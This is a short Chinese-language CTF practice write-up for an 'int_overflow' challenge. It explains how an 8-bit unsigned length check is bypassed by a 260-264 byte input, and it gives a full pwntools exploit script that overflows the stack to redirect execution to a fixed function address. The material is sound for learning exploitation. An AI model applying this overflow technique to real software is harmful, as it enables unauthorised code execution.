新手练习09-int_overflow

整数溢出题目，checksec 一波

image.png

可以进行栈溢出，但是我们发现要到达溢出点要先绕过v3的检测，v3是输入字符串s的长度，要求在（3，8]

image.png

v3是一个8位无符号整型，最大只能是255，而read(0, &buf, 0x199u);远大于255，所以我们输入的s只要在260-264即可
exp:

from pwn import *
p = process('./int_overflow')
# p = remote("111.198.29.45","31255")
what_is_this = 0x804868B
p.recvuntil('choice:')
p.sendline("1")
p.recvuntil('username:\n')
p.sendline("n0va")
p.recvuntil("passwd:\n")
payload = 0x18*'a' + p32(what_is_this)
payload = payload.ljust(262,'a')
# print len(payload)
# pause()
p.sendline(payload)
# print p.recvall()
p.interactive()